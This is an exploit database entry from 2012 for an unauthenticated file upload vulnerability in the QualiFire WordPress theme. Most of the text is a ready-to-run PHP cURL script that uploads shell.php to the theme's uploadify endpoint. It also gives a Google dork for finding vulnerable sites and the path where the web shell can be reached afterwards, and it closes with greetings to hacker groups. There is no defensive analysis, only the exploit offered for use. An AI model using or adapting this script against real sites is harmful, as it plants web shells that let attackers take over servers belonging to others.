Wordpress Themes QualiFire File Upload Vulnerability

2012-07-01T00:00:00
ID 1337DAY-ID-18892
Type zdt
Reporter Tn_Scorpion
Modified 2012-07-01T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            #######################################################################
Exploit Title: Wordpress Themes  QualiFire File Upload Vulnerability
Google Dork: inurl:wp-content/themes/qualifire
Date: 30/06/2012
Author: Tn_Scorpion
Software Link: http://themeforest.net/item/qualifire-wordpress-theme/105879 ( it's not free 40$ )
#######################################################################

[+] exploit

<?php
 
$uploadfile="shell.php";
$ch = curl_init("http://example.com/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
              array('Filedata'=>"@$uploadfile",
              'folder'=>'/wp-content/themes/qualifire/scripts/admin/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
 
  print "$postResult";
?>
 
Shell Access : http://www.exemple.com/wp-content/themes/qualifire/scripts/admin/uploadify/

#######################################################################

Gr33rz to : Tunisian spl01t3r , Maxim Tatto , KillerMind , Hacker-1420 , Anas Laribi , H3rcule-32 , dOctor.Virus ,
 KinG Of Controle , King Of Pirates , Ked Ans ....... & All Muslim Hackers 
Profile :  www.facebook.com/Viva.Hackers



#  0day.today [2018-03-13]  #